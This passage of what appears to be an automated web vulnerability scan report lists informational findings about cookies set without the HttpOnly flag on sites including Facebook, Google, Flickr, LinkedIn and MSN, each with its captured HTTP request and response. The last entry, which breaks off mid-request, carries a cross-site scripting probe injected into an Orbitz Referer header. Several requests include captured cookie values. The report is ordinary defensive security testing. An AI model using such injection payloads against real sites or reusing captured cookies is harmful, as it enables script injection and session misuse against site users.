HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:19:36 GMT
Server: Unspecified
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: YPAID=b0fff94c2a3c423fe56d646beacd945b; expires=Fri, 04-Feb-2011 06:00:00 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://opengraphprotoc
...[SNIP]...

13.219. http://www.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:20 GMT
Content-Length: 30803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.220. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.221. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:25 GMT
Content-Length: 0


13.222. http://www.facebook.com/pages/Veoh/129836657035793  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Veoh/129836657035793

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Veoh/129836657035793 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/VeohTV
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 0


13.223. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:39 GMT
Content-Length: 10796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.224. http://www.facebook.com/supermediacom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /supermediacom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

13.225. http://www.flickr.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:30 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com
X-Served-By: www87.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Search</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta n
...[SNIP]...

13.226. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=p2zNnJZpTnA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:55:57 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10833
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

13.227. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=hB-ORbAny80;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:56:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...

13.228. http://www.inceptor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inceptor.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.inceptor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:20:10 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:35:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

13.229. http://www.jackpotcity.com/online-casino/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jackpotcity.com
Path:   /online-casino/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-casino/ HTTP/1.1
Host: www.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/Support.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wa3qlqzjtebv1q45odolquvj; path=/; HttpOnly
Set-Cookie: CCH=JPC; expires=Sun, 31-Jan-2021 20:29:22 GMT; path=/
Set-Cookie: FCVR=1412626858; expires=Sun, 31-Jan-2021 20:29:22 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:22 GMT
Vary: Accept-Encoding
Content-Length: 29513


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   
Onl
...[SNIP]...

13.230. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=829c034d40083b97a500eea83e80612d; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:12 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

13.231. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:45 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJclZoSofA3ibAg==; expires=Fri, 03-Feb-12 22:01:45 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s6; path=/
Cache-control: private
Content-Length: 154109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...

13.232. http://www.linkedin.com/in/troyd/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /in/troyd/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

13.233. http://www.localsearch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localsearch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.localsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:12:05 GMT
Server: Unspecified
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lm0uuwyk1gzm3azhc3xuz5vt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21726
Set-Cookie: NSC_xxx-mpdbmtfbsdi-dpn-80=ffffffff9482028145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:30:59 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   The Local Sear
...[SNIP]...

13.234. http://www.milanoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milanoo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.milanoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: milanooId=caa4dd2ddd2fa909515c8860d4864921; path=/
Set-Cookie: milanooId=0ae3e4e9d51c2e0247e06c0bf5f350b0; path=/
Set-Cookie: lang_cookie=en-uk; expires=Sun, 31-Jan-2021 20:29:30 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Sat, 05-Mar-2011 20:29:30 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

13.235. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.msn.com
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~126II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.msn.com; expires=Mon, 07-Feb-2011 02:29:37 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Fri, 18-Feb-2011 02:29:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 80938
Content-Length: 80938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

13.236. http://www.mybloglog.com/buzz/members/smartdesis/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /buzz/members/smartdesis/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /buzz/members/smartdesis/x22 HTTP/1.1
Host: www.mybloglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:28:24 GMT
Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Page Not Found - MyBlogLog</title>
<meta http-equiv="Cont
...[SNIP]...

13.237. http://www.omniture.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:21:03 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

13.238. http://www.orbitz.com/tealeaf.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /tealeaf.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tealeaf.jsp HTTP/1.1
Accept: */*
Accept-Language: en-us
x-tealeaf: ClientEvent
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
